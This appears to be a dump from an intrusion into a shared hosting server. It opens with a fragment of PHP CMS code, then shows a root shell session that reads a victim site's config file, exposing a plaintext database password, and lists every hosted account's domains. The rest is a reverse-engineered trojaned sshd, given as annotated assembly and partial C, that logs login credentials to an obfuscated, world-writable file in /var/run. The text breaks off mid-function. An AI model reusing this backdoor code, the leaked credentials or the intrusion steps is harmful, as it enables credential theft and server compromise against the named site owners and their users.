: if (isset($_SERVER["HTTP_IF_MODIFIED_SINCE"]) &&
: ($_SERVER["HTTP_IF_MODIFIED_SINCE"] == $tsstring)) {
: header("HTTP/1.1 304 Not Modified");
: exit();
: }
: // Inform the user what is our last modification date
: else {
: header("Last-Modified: " . $tsstring);
: }
:}*/
:
://The class files
:require($cms_root."core/classes/class.sql.php");
:if(!SMODE)require($cms_root."core/classes/class.login.php");
:if(!SMODE)require($cms_root."core/classes/class.user.php");
:if(!SMODE)require($cms_root."core/classes/class.form.php");
:if(!SMODE)require($cms_root."core/classes/class.time.php");
:require($cms_root."core/classes/class.nbbc.php");
:require($cms_root."core/classes/class.tpl.php");
:if(!SMODE)require($cms_root."core/classes/class.cache.php");
:require($cms_root."core/classes/class.geshi.php");
:
://The base functions
:require($cms_root."core/base_functions.php");
:
://///////////////////////////////////////////////////////////////////////////
://--Sort out the cached config stuff---------------------------------------//
://///////////////////////////////////////////////////////////////////////////
:$config_db = array();
://check see if the config file exists, if not then just create a blank config
va
:riable
:if(file_exists($cms_root."cache/cache_config.php")){ include
$cms_root."cache/ca
:che_config.php"; }
:
://If the config_db is not null, cached.. then use it.
:if($config_db !== NULL){
: foreach($config_db as $array){
: $config[$array['array']][$array['var']] = $array['value'];
: }
: unset($array);
:}
:
:if(isset($_GET['_site'])){
: $a=(isset($_GET['_site']) ? $_GET['_site'] :
(isset($_SESSION['site']['mode'
:]) ? $_SESSION['site']['mode'] : $config['db']['prefix']));
: switch($a){
: case 'dmz':
: $_SESSION['site']['mode'] = 'dmz_';
: break;
: case 'cs':
: $_SESSION['site']['mode'] = 'cs_';
: break;
: default:
: }
:}
:if(isset($_SESSION['site']['mode']))
: $config['db']['prefix'] = $_SESSION['site']['mode'];
:
://///////////////////////////////////////////////////////////////////////////
://--Define new instances of required classes-------------------------------//
://///////////////////////////////////////////////////////////////////////////
://start the sql
:$_sql = new sql(true);
:$_sql->config = $config;
:if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
:if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
:
:
://Open the session stuff
:$_sess->sql = $_sql;
:$_sess->config = $config;
:
://start the form class
:$_form = new form;
:
://start the user class
:$_user = new user;
:$_user->config = $config;
:$_user->sql = $_sql;
root@server2:/home/romeo/domains[root@server2 domains]# cd cybershade.org/
# RoMeO's butt buddy xlink aka mad php c0d3r
root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
ls -al
drwxr-xr-x 2 romeo romeo 4096 Dec 23 14:31 .htpasswd
drwxr-xr-x 2 root root 4096 May 23 00:10 logs
drwx--x--x 3 romeo romeo 4096 Dec 23 14:31 public_ftp
drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 public_html
drwxr-xr-x 2 root root 4096 May 1 00:10 stats
root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
cd public_html/
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
public_html]# ls -al
total 1188
drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 .
drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 ..
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 400.shtml
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 401.shtml
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 403.shtml
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 404.shtml
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 500.shtml
-rw-r--r-- 1 romeo romeo 5254 Feb 16 08:01 acp.php
-rw-r--r-- 1 romeo romeo 9757 Feb 16 08:01 ajax.php
-rw-r--r-- 1 romeo romeo 2118 Feb 16 08:01 articles.php
drwxrwxrwx 5 romeo romeo 4096 Feb 10 19:31 cache
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 cgi-bin
-rw-r--r-- 1 romeo romeo 5561 Feb 16 08:01 challenges.php
-rw-r--r-- 1 romeo romeo 466963 Mar 1 14:51 cms_docs.zip
-rw-r--r-- 1 romeo romeo 2137 Feb 10 19:31 codebase.php
-rw-r--r-- 1 romeo romeo 17251 Feb 10 19:31 convertor.php
drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 core
-rw-r--r-- 1 romeo romeo 0 Feb 10 19:31 debug
-rw-r--r-- 1 romeo romeo 3266 Feb 10 19:31 eg.gif
-rw-r--r-- 1 romeo romeo 28213 Mar 20 12:59 farm.php
-rw-r--r-- 1 romeo romeo 5020 Feb 16 08:01 forgotpass.php
-rw-r--r-- 1 romeo romeo 7097 Feb 19 14:12 forum.php
-rw-r--r-- 1 romeo romeo 2110 Feb 16 08:01 get_shouts.php
-rw-r--r-- 1 romeo romeo 4546 Feb 19 14:12 .htaccess
-rw-r--r-- 1 romeo romeo 36 Feb 10 19:31 .htpasswd
drwxr-xr-x 4 romeo romeo 4096 Feb 10 19:31 images
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 img
-rw-r--r-- 1 romeo romeo 3998 Feb 16 08:01 index.php
-rw-r--r-- 1 romeo romeo 843 Feb 16 08:01 irc.php
drwxr-xr-x 3 romeo romeo 4096 Feb 10 19:31 language
-rw-r--r-- 1 romeo romeo 4103 Feb 19 14:12 latest_posts.php
-rwxr-xr-x 1 romeo romeo 7184 Feb 16 08:01 loader.php
-rw-r--r-- 1 romeo romeo 8398 Feb 16 08:01 login.php
-rwxr-xr-x 1 romeo romeo 13954 Feb 10 19:31 logo.jpg
-rw-r--r-- 1 romeo romeo 3006 Feb 16 08:01 merge.php
drwxr-xr-x 20 romeo romeo 4096 Feb 17 09:01 modules
-rw-r--r-- 1 romeo romeo 10964 Feb 16 08:01 pastebin.php
-rw-r--r-- 1 romeo romeo 35466 Feb 19 14:39 post.php
-rw-r--r-- 1 romeo romeo 2142 Feb 16 08:01 privatemessages.php
-rw-r--r-- 1 romeo romeo 9755 Feb 21 09:08 register.php
-rw-r--r-- 1 romeo romeo 7986 Feb 16 08:01 rss.php
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 scripts
-rw-r--r-- 1 romeo romeo 1065 Feb 16 08:01 search.php
-rw-r--r-- 1 romeo romeo 1838 Feb 16 08:01 settings.php
drwxr-xr-x 8 romeo romeo 4096 Mar 19 10:13 skin
-rw-r--r-- 1 romeo romeo 196608 Mar 19 10:20 skin.tgz
-rw-r--r-- 1 romeo romeo 636 Feb 16 08:01 staff.php
-rw-r--r-- 1 romeo romeo 133049 May 23 04:00 stress_test.txt
-rw-r--r-- 1 romeo romeo 994 Feb 10 19:31 swiigle_upload.php
drwxr-xr-x 5 romeo romeo 4096 Feb 16 19:13 template
-rw-r--r-- 1 romeo romeo 454 Feb 10 19:31 template.php
-rw-r--r-- 1 romeo romeo 590 Feb 10 19:31 test.php
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 txt docs
-rw-r--r-- 1 romeo romeo 2708 Feb 16 08:01 ucp.php
-rw-r--r-- 1 romeo romeo 8546 Feb 19 14:12 view_group.php
-rw-r--r-- 1 romeo romeo 876 Feb 16 08:01 view_profile.php
-rw-r--r-- 1 romeo romeo 12838 Feb 19 14:12 view_topic.php
-rw-r--r-- 1 romeo romeo 9571 Feb 16 08:01 windowed_options.php
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
public_html]# cd core
root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
core]# ls -al
total 164
drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 .
drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 ..
-rw-r--r-- 1 romeo romeo 731 Feb 10 19:31 admin.js
-rw-r--r-- 1 romeo romeo 27175 Feb 16 19:00 base_functions.php
-rw-r--r-- 1 romeo romeo 9266 Feb 16 19:00 bbcode_tags.php
-rw-r--r-- 1 romeo romeo 2816 Feb 10 19:31 cacher.php
drwxr-xr-x 4 romeo romeo 4096 Feb 10 19:31 classes
-rw-r--r-- 1 romeo romeo 1376 Feb 16 19:00 cli.php
-rw-r--r-- 1 romeo romeo 2847 Feb 10 19:33 config.php
-rw-r--r-- 1 romeo romeo 23727 Feb 17 09:53 core.php
-rw-r--r-- 1 romeo romeo 4518 Feb 10 19:31 cron.php
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 err
-rw-r--r-- 1 romeo romeo 236 Feb 16 19:00 force_user.php
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 functions
-rw-r--r-- 1 romeo romeo 1181 Feb 16 19:00 key.php
-rw-r--r-- 1 romeo romeo 6903 Feb 16 19:00 mailer.php
drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 mint
-rw-r--r-- 1 romeo romeo 3054 Feb 16 19:00 page_footer.php
-rw-r--r-- 1 romeo romeo 6429 Feb 16 19:00 page_header.php
-rw-r--r-- 1 romeo romeo 9762 Feb 16 19:00 recaptchalib.php
-rw-r--r-- 1 romeo romeo 6601 Apr 5 12:58 security.php
-rw-r--r-- 1 romeo romeo 2760 Feb 16 19:00 usertracker.php
root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
core]# less config.php
<?php
//Cybershade.Org
//Database Stuff
$config['db']['host'] = 'localhost';
$config['db']['username'] = 'romeo_romeo';
$config['db']['password'] = 'swU55ath';
$config['db']['database'] = 'romeo_DMZ_CS';
$config['db']['prefix'] = 'cs_';
$config['db']['shrfix'] = 'shr_'; //the prefix
f
or the shared tables
$config['db']['ckefix'] = 'CMS_'; //the cookie prefix
$config['db']['ckeauth'] = '0.7.0'; //the cookie auth key //this
is also a good way to invalidate the autologins on cms update
$config['site']['working_dir'] = '';
//config vars for if we loose the DB
$config['cms']['name'] = 'DarkMindZ';
$config['cms']['version'] = '_DDoS';
$config['cms']['debug'] = "0";
$config['site']['title'] = 'CyberShade CMS';
$config['site']['theme'] = 'cs';
$config['site']['language'] = 'en';
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
public_html]# less stress_test.txt
/codebase/perl-2.html - 74.6.17.162 - Queries: 26 - SQLTime: 68.93934 -
PAGETime
r: -0.83011 |
/register.php - 89.149.254.135 - Queries: 5 - SQLTime: 10.82445 - PAGETimer:
0.2
6816 |
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 11.93658 - PAGETimer:
0.1065
6 |
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 11.43613 - PAGETimer:
0.0528
6 |
/index.php - 89.149.254.135 - Queries: 8 - SQLTime: 30.80612 - PAGETimer:
0.0420
1 |
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 12.93695 - PAGETimer:
0.0522
9 |
/index.php - 89.149.254.135 - Queries: 8 - SQLTime: 14.52338 - PAGETimer:
0.0435
5 |
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 14.55832 - PAGETimer:
0.0514
6 |
/forum/post.php?mode=lock_thread&id=5559 - 74.6.17.162 - Queries: 10 - SQLTime:
30.93873 - PAGETimer: 0.2404 |
/forum/thread5853.html - 66.249.70.100 - Queries: 18 - SQLTime: 41.73033 -
PAGET
imer: 0.09753 |
/codebase/mailform-asp-num147.html - 65.55.211.89 - Queries: 9 - SQLTime:
13.306
77 - PAGETimer: 0.11182 |
/ - 216.80.92.36 - Queries: 8 - SQLTime: 21.05451 - PAGETimer: 0.05534 |
root@server2:~[root@server2 ~]# cd /home
root@server2:/home[root@server2 home]# ls -la
total 152
drwx--x--x 36 root root 4096 May 23 02:33 .
drwx--x--x 25 root root 4096 May 22 09:26 ..
drwx--x--x 8 aaa aaa 4096 Jan 24 22:06 aaa
drwx--x--x 6 admin admin 4096 Jan 12 14:29 admin
drwx--x--x 8 beyond beyond 4096 Jan 24 22:33 beyond
drwx--x--x 4 bloo bloo 4096 May 23 02:04 bloo
drwx--x--x 7 bootroot bootroot 4096 May 12 21:27 bootroot
drwx------ 2 clamav clamav 4096 Apr 1 22:35 clamav
drwx--x--x 6 dablitz dablitz 4096 May 21 23:50 dablitz
drwx--x--x 6 dakilla dakilla 4096 May 20 23:41 dakilla
drwxr-xr-x 2 root root 4096 Dec 3 2007 ftp
drwx--x--x 8 furiogamin furiogamin 4096 May 21 02:55 furiogamin
drwx--x--x 7 h3mod h3mod 4096 Feb 26 17:31 h3mod
drwx--x--x 5 haiobr haiobr 4096 May 19 06:43 haiobr
drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 hbxmike
drwx--x--x 8 hotglow hotglow 4096 Jan 24 22:35 hotglow
drwx--x--x 8 hrdev hrdev 4096 May 13 18:43 hrdev
drwx--x--x 7 hstrike hstrike 4096 Feb 17 15:56 hstrike
drwx--x--x 6 kaza kaza 4096 Apr 27 20:47 kaza
drwx--x--x 6 keytraderz keytraderz 4096 Apr 15 15:37 keytraderz
drwx--x--x 6 mrgod mrgod 4096 May 15 14:32 mrgod
drwx--x--x 5 odin odin 4096 May 8 05:01 odin
drwx--x--x 5 pagewiz pagewiz 4096 May 18 18:49 pagewiz
drwx--x--x 6 penguin penguin 4096 Mar 8 18:49 penguin
drwx--x--x 6 pimpinjg pimpinjg 4096 Mar 26 16:13 pimpinjg
drwx--x--x 5 ristop ristop 4096 May 22 15:33 ristop
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 romeo
drwx--x--x 4 sam sam 4096 May 12 09:26 sam
drwx--x--x 7 scraft758 scraft758 4096 Apr 16 20:03 scraft758
drwx------ 2 546 547 4096 May 23 02:33 test
drwxrwxrwt 2 root root 4096 May 23 03:36 tmp
drwx--x--x 6 wheelglow wheelglow 4096 Jan 24 22:49 wheelglow
drwx--x--x 5 wtfsmilez wtfsmilez 4096 May 2 13:11 wtfsmilez
drwx--x--x 8 xckx xckx 4096 Feb 22 02:44 xckx
drwx--x--x 5 yourkicks yourkicks 4096 Jan 28 21:21 yourkicks
drwx--x--x 5 zer0 zer0 4096 May 23 01:28 zer0
root@server2:/home/zer0/domains[root@server2 domains]# ls -la /home/*/domains/
/home/aaa/domains/:
total 12
drwx--x--x 3 aaa aaa 4096 Sep 14 2007 .
drwx--x--x 8 aaa aaa 4096 Jan 24 22:06 ..
drwx--x--x 8 aaa aaa 4096 Sep 14 2007 aaasoda.com
/home/admin/domains/:
total 20
drwx--x--x 5 admin admin 4096 Jan 12 14:29 .
drwx--x--x 6 admin admin 4096 Jan 12 14:29 ..
drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 default
drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 sharedip
drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 suspended
/home/beyond/domains/:
total 12
drwx--x--x 3 beyond beyond 4096 Sep 12 2007 .
drwx--x--x 8 beyond beyond 4096 Jan 24 22:33 ..
drwx--x--x 8 beyond beyond 4096 Feb 6 2008 beyond-comparison.com
/home/bloo/domains/:
total 12
drwx--x--x 3 bloo bloo 4096 May 23 02:04 .
drwx--x--x 4 bloo bloo 4096 May 23 02:04 ..
drwx--x--x 6 bloo bloo 4096 May 23 02:04 bloohacks.com
/home/bootroot/domains/:
total 20
drwx--x--x 5 bootroot bootroot 4096 May 12 21:27 .
drwx--x--x 7 bootroot bootroot 4096 May 12 21:27 ..
drwx--x--x 8 bootroot bootroot 4096 May 9 18:57 bootforfun.com
drwx--x--x 7 bootroot bootroot 4096 Mar 2 00:11 bootforfun.net
drwx--x--x 7 bootroot bootroot 4096 May 13 00:10 bootforfun.org
/home/dablitz/domains/:
total 16
drwx--x--x 4 dablitz dablitz 4096 Jan 3 23:34 .
drwx--x--x 6 dablitz dablitz 4096 May 21 23:50 ..
drwx--x--x 8 dablitz dablitz 4096 Jan 17 10:32 blitzcraze.com
drwx--x--x 8 dablitz dablitz 4096 Jan 24 07:14 blitzdownloads.com
/home/dakilla/domains/:
total 12
drwxr-xr-x 3 dakilla dakilla 4096 May 16 07:49 .
drwx--x--x 6 dakilla dakilla 4096 May 20 23:41 ..
drwxr-xr-x 8 dakilla dakilla 4096 Feb 15 00:11 scionbot.com
/home/furiogamin/domains/:
total 20
drwx--x--x 5 furiogamin furiogamin 4096 Feb 19 06:57 .
drwx--x--x 8 furiogamin furiogamin 4096 May 21 02:55 ..
drwx--x--x 8 furiogamin furiogamin 4096 Feb 18 11:04 furiogaming.com
drwx--x--x 7 furiogamin furiogamin 4096 Dec 27 21:11 furiogaming.net
drwx--x--x 5 furiogamin furiogamin 4096 Apr 10 13:14 softmodding.net
/home/h3mod/domains/:
total 12
drwx--x--x 3 h3mod h3mod 4096 Jan 18 2008 .
drwx--x--x 7 h3mod h3mod 4096 Feb 26 17:31 ..
drwx--x--x 8 h3mod h3mod 4096 Oct 2 2008 h3mod.com
/home/haiobr/domains/:
total 12
drwxr-xr-x 3 haiobr haiobr 4096 May 1 14:26 .
drwx--x--x 5 haiobr haiobr 4096 May 19 06:43 ..
drwxr-xr-x 9 haiobr haiobr 4096 May 1 14:26 super-syn.net
/home/hbxmike/domains/:
total 16
drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 .
drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 ..
drwx--x--x 7 hbxmike hbxmike 4096 May 12 00:11 hackordie.net
drwx--x--x 8 hbxmike hbxmike 4096 Apr 29 00:10 wesellstuff.biz
/home/hotglow/domains/:
total 12
drwxr-xr-x 3 hotglow hotglow 4096 Sep 3 2007 .
drwx--x--x 8 hotglow hotglow 4096 Jan 24 22:35 ..
drwxr-xr-x 8 hotglow hotglow 4096 Sep 3 2007 hotglowneon.com
/home/hrdev/domains/:
total 12
drwxr-xr-x 3 hrdev hrdev 4096 Dec 2 19:31 .
drwx--x--x 8 hrdev hrdev 4096 May 13 18:43 ..
drwxr-xr-x 8 hrdev hrdev 4096 Dec 10 2007 hr-development.net
/home/hstrike/domains/:
total 12
drwx--x--x 3 hstrike hstrike 4096 Apr 24 2008 .
drwx--x--x 7 hstrike hstrike 4096 Feb 17 15:56 ..
drwx--x--x 8 hstrike hstrike 4096 Oct 31 2008 halostrike.com
/home/kaza/domains/:
total 28
drwx--x--x 7 kaza kaza 4096 Apr 25 15:46 .
drwx--x--x 6 kaza kaza 4096 Apr 27 20:47 ..
drwx--x--x 7 kaza kaza 4096 Jan 6 21:14 crypticgamers.com
drwx--x--x 7 kaza kaza 4096 Jan 5 21:13 crypticgamers.net
drwx--x--x 7 kaza kaza 4096 Jan 15 21:12 godlymods.com
drwx--x--x 7 kaza kaza 4096 May 4 08:50 kindclan.co.cc
drwx--x--x 7 kaza kaza 4096 Feb 4 00:10 mortonnetworks.com
/home/keytraderz/domains/:
total 20
drwx--x--x 5 keytraderz keytraderz 4096 Jan 18 21:18 .
drwx--x--x 6 keytraderz keytraderz 4096 Apr 15 15:37 ..
drwx--x--x 8 keytraderz keytraderz 4096 Jan 5 21:20 1nesolution.com
drwx--x--x 8 keytraderz keytraderz 4096 Jan 13 21:16 gotmovies.net
drwx--x--x 8 keytraderz keytraderz 4096 Jan 2 21:15 keytraderz.com
/home/mrgod/domains/:
total 12
drwx--x--x 3 mrgod mrgod 4096 May 14 19:46 .
drwx--x--x 6 mrgod mrgod 4096 May 15 14:32 ..
drwx--x--x 7 mrgod mrgod 4096 May 15 00:11 international-gaming.net
/home/odin/domains/:
total 12
drwx--x--x 3 odin odin 4096 May 2 04:09 .
drwx--x--x 5 odin odin 4096 May 8 05:01 ..
drwx--x--x 7 odin odin 4096 May 15 08:14 evilzone.ws
/home/pagewiz/domains/:
total 12
drwx--x--x 3 pagewiz pagewiz 4096 May 18 18:08 .
drwx--x--x 5 pagewiz pagewiz 4096 May 18 18:49 ..
drwx--x--x 8 pagewiz pagewiz 4096 May 19 00:10 pagewizzstudio.com
/home/penguin/domains/:
total 12
drwx--x--x 3 penguin penguin 4096 Dec 20 11:24 .
drwx--x--x 6 penguin penguin 4096 Mar 8 18:49 ..
drwx--x--x 7 penguin penguin 4096 Dec 20 21:12 phylumstudios.com
/home/pimpinjg/domains/:
total 16
drwx--x--x 4 pimpinjg pimpinjg 4096 Mar 26 16:13 .
drwx--x--x 6 pimpinjg pimpinjg 4096 Mar 26 16:13 ..
drwx--x--x 7 pimpinjg pimpinjg 4096 Mar 26 16:13 h4ckinab0x.com
drwx--x--x 7 pimpinjg pimpinjg 4096 Mar 27 00:11 teamhbx.com
/home/ristop/domains/:
total 12
drwx--x--x 3 ristop ristop 4096 May 22 13:33 .
drwx--x--x 5 ristop ristop 4096 May 22 15:33 ..
drwx--x--x 8 ristop ristop 4096 May 23 00:10 centosservers.com
/home/romeo/domains/:
total 16
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
/home/sam/domains/:
total 12
drwx--x--x 3 sam sam 4096 May 12 09:00 .
drwx--x--x 4 sam sam 4096 May 12 09:26 ..
drwx--x--x 8 sam sam 4096 May 13 00:11 metus-project.com
/home/scraft758/domains/:
total 24
drwx--x--x 6 scraft758 scraft758 4096 Apr 16 20:03 .
drwx--x--x 7 scraft758 scraft758 4096 Apr 16 20:03 ..
drwx--x--x 7 scraft758 scraft758 4096 Jan 27 21:12 mods4hire.com
drwx--x--x 7 scraft758 scraft758 4096 Mar 25 2008 samcraft.com
drwx--x--x 7 scraft758 scraft758 4096 Mar 25 2008 samcraft.net
drwx--x--x 7 scraft758 scraft758 4096 Oct 28 2008 theconsolejunkies.com
/home/wheelglow/domains/:
total 12
drwx--x--x 3 wheelglow wheelglow 4096 Sep 12 2007 .
drwx--x--x 6 wheelglow wheelglow 4096 Jan 24 22:49 ..
drwx--x--x 8 wheelglow wheelglow 4096 Sep 12 2007 wheelglow.com
/home/wtfsmilez/domains/:
total 12
drwx--x--x 3 wtfsmilez wtfsmilez 4096 Apr 30 17:00 .
drwx--x--x 5 wtfsmilez wtfsmilez 4096 May 2 13:11 ..
drwx--x--x 8 wtfsmilez wtfsmilez 4096 May 3 19:12 wtfgamers.net
/home/xckx/domains/:
total 16
drwx--x--x 4 xckx xckx 4096 Feb 22 02:44 .
drwx--x--x 8 xckx xckx 4096 Feb 22 02:44 ..
drwx--x--x 7 xckx xckx 4096 Apr 16 2008 oinfam0uso.com
drwx--x--x 7 xckx xckx 4096 Feb 23 00:12 snayke.com
/home/yourkicks/domains/:
total 16
drwx--x--x 4 yourkicks yourkicks 4096 Jan 6 19:33 .
drwx--x--x 5 yourkicks yourkicks 4096 Jan 28 21:21 ..
drwx--x--x 8 yourkicks yourkicks 4096 Jan 6 21:15 yourkicksonline.com
drwx--x--x 8 yourkicks yourkicks 4096 Jan 6 21:15 yourkicksonline.net
/home/zer0/domains/:
total 12
drwx--x--x 3 zer0 zer0 4096 May 20 17:00 .
drwx--x--x 5 zer0 zer0 4096 May 23 01:28 ..
drwx--x--x 8 zer0 zer0 4096 May 23 01:28 zer0zone.ws
Ghetto.
_______ _______ ______
\ _ \ ___ __\ _ \ / __ \
/ /_\ \\ \/ / /_\ \ > <
\ \_/ \> <\ \_/ \/ -- \
\_____ /__/\_ \\_____ /\______ /
\/ \/ \/ \/
__________ __ .___
\______ \_____ ____ | | __ __| _/____ ___________
| | _/\__ \ _/ ___\| |/ // __ |/ _ \ / _ \_ __ \
| | \ / __ \\ \___| </ /_/ ( <_> | <_> ) | \/
|______ /(____ /\___ >__|_ \____ |\____/ \____/|__|
\/ \/ \/ \/ \/
___________________ ___________
\______ \_ ___ \\_ _____/
| _/ \ \/ | __)_
| | \ \____| \
|____|_ /\______ /_______ /
\/ \/ \/
char abuff[1024];
char sbuff[1024];
char * aSSSSSS = "%s%s\t [ %s %s %s %s ]"; //db '%s%s',9,' [ %s %s %s %s ]',0Ah
char * a0m = "\x1B[0m"; //db 1Bh,'[0m',0
char * aOwned ="see below";
char * aAGb7 = "a-gb7"
/*
.rodata:08078D34 aOwned db 0Ah ; DATA XREF: do_motd+DFo
.rodata:08078D34 db 9,9,'+----------------------------[ Owned ]-------------------------'
.rodata:08078D34 db '---+',0Ah
.rodata:08078D34 db 9,9,'| Hack everyone you can and then hack some more '
.rodata:08078D34 db ' |',0Ah
.rodata:08078D34 db 9,9,'| Owned[DC] v2 '
.rodata:08078D34 db ' |',0Ah
.rodata:08078D34 db 9,9,'| _______ . _______ . _______ '
.rodata:08078D34 db ' |',0Ah
.rodata:08078D34 db 9,9,'| Get in as anonymous, Leave with no trace. '
.rodata:08078D34 db ' |',0Ah
.rodata:08078D34 db 9,9,'| '
.rodata:08078D34 db ' |',0Ah
.rodata:08078D34 db 9,9,'+--------------------------------------------------------------'
.rodata:08078D34 db '---+',0Ah,0
*/
char * a033031mOwned03 = "\[\033[0;31m\]Owned\[\033[1;30m\][\[\033[1;37m\]DC\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] ";
char s[1024];
char * filename = "/var/run/ssh.old";
char i = 0;
size_t len;
FILE * log;
char * HookinSS = "HOOKIN: %s:%s"
char * a0x3aownt = "0x3aownt";
char * aSk3rhgldyw = "Sk3rhGLdYW";
//known structs
struct passwd {
char *pw_name;
char *pw_passwd;
uid_t pw_uid;
gid_t pw_gid;
time_t pw_change;
char *pw_class;
char *pw_gecos;
char *pw_dir;
char *pw_shell;
time_t pw_expire;
};
struct Authctxt {
int success;
int postponed; /* authentication needs another step */
int valid; /* user exists and is allowed to login */
int attempt;
int failures;
int force_pwchange;
char *user; /* username sent by the client */
char *service;
struct passwd *pw; /* set if 'valid' */
char *style;
void *kbdintctxt;
#ifdef BSD_AUTH
auth_session_t *as;
#endif
#ifdef KRB5
krb5_context krb5_ctx;
krb5_ccache krb5_fwd_ccache;
krb5_principal krb5_user;
char *krb5_ticket_file;
char *krb5_ccname;
#endif
Buffer *loginmsg;
void *methoddata;
};
struct utsname {
char sysname[_SYS_NMLN];
char nodename[_SYS_NMLN];
char release[_SYS_NMLN];
char version[_SYS_NMLN];
char machine[_SYS_NMLN];
}
/* sys_auth_passwd
.text:0804FA98 push edi
.text:0804FA99 push dword ptr [esi] ; esi = arg_0 + 20h
.text:0804FA99 ; authctxt->pw
.text:0804FA99 ; [esi] = pw->pw_name
.text:0804FA9B push offset aHookinSS ; "HOOKIN: %s:%s\n"
.text:0804FAA0 push offset abuff ; s
.text:0804FAA5 call _sprintf
.text:0804FAAA mov edi, offset abuff ; start: strlen(abuff)
.text:0804FAAF xor eax, eax
.text:0804FAB1 cld
.text:0804FAB2 mov ecx, 0FFFFFFFFh
.text:0804FAB7 repne scasb
.text:0804FAB9 not ecx
.text:0804FABB lea edx, [ecx-1]
.text:0804FABE add esp, 10h
.text:0804FAC1 cmp ebx, edx ; fin;
.text:0804FAC3 mov ds:alen, edx ; alen = strlen result
.text:0804FAC9 mov ds:ai, 0 ; for(ai = 0
.text:0804FAD3 jg short loc_804FAE8
.text:0804FAD5 xor eax, eax
.text:0804FAD7 nop
.text:0804FAD8
.text:0804FAD8 loc_804FAD8: ; CODE XREF: sys_auth_passwd+CDj
.text:0804FAD8 not ds:abuff[eax]
.text:0804FADE inc eax ; eax++ (ai++)
.text:0804FADF cmp eax, edx ; ;ai<=edx (alen)
.text:0804FAE1 jle short loc_804FAD8
.text:0804FAE3 mov ds:ai, eax
.text:0804FAE8
.text:0804FAE8 loc_804FAE8: ; CODE XREF: sys_auth_passwd+BFj
.text:0804FAE8 sub esp, 8
.text:0804FAEB push (offset aDsa_0+2) ; aDsa = db 'dsa',0 | aDsa+2h = 'a',0
.text:0804FAF0 push offset filename ; "/var/run/ssh.old"
.text:0804FAF5 call _fopen ; fopen(filename,"a")
.text:0804FAFA add esp, 10h
.text:0804FAFD test eax, eax ; if(fopen(...) != NULL)
.text:0804FAFD ; jump
.text:0804FAFF mov ds:alog, eax
.text:0804FB04 jnz short loc_804FB3B
.text:0804FB06
.text:0804FB06 loc_804FB06: ; CODE XREF: sys_auth_passwd+149j
.text:0804FB06 sub esp, 8
.text:0804FB09 push 1B6h ; mode (0666)
.text:0804FB0E push offset filename ; "/var/run/ssh.old"
.text:0804FB13 call _chmod ; chmod(filename,0666)
.text:0804FB18 lea esp, [ebp-0Ch]
.text:0804FB1B pop ebx
.text:0804FB1C pop esi
.text:0804FB1D mov eax, 1
.text:0804FB22 pop edi
.text:0804FB23 leave
.text:0804FB24 retn ; return 1
.text:0804FB24 ; ---------------------------------------------------------------------------
.text:0804FB25 align 4
.text:0804FB28
.text:0804FB28 loc_804FB28: ; CODE XREF: sys_auth_passwd+17j
.text:0804FB28 sub esp, 0Ch
.text:0804FB2B push esi
.text:0804FB2C call shadow_pw
.text:0804FB31 mov ebx, eax
.text:0804FB33 add esp, 10h
.text:0804FB36 jmp loc_804FA34
.text:0804FB3B ; ---------------------------------------------------------------------------
.text:0804FB3B
.text:0804FB3B loc_804FB3B: ; CODE XREF: sys_auth_passwd+F0j
.text:0804FB3B push eax ; eax = file stream
.text:0804FB3C push 1
.text:0804FB3E push ds:alen ; length of abuff
.text:0804FB44 push offset abuff ; ptr to abuff
.text:0804FB49 call _fwrite
.text:0804FB4E pop eax
.text:0804FB4F push ds:alog ; stream
.text:0804FB55 call _fclose ; fclose(alog)
.text:0804FB5A add esp, 10h
.text:0804FB5D jmp short loc_804FB06
.text:0804FB5D sys_auth_passwd endp
*/
sys_auth_passwd(Authctxt *authctxt, const char *password)
{
struct passwd *pw = authctxt->pw;
char *encrypted_password;
/* Just use the supplied fake password if authctxt is invalid */
char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;
/* Check for users with no password. */
if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
return (1);
/* Encrypt the candidate password using the proper salt. */
encrypted_password = xcrypt(password,
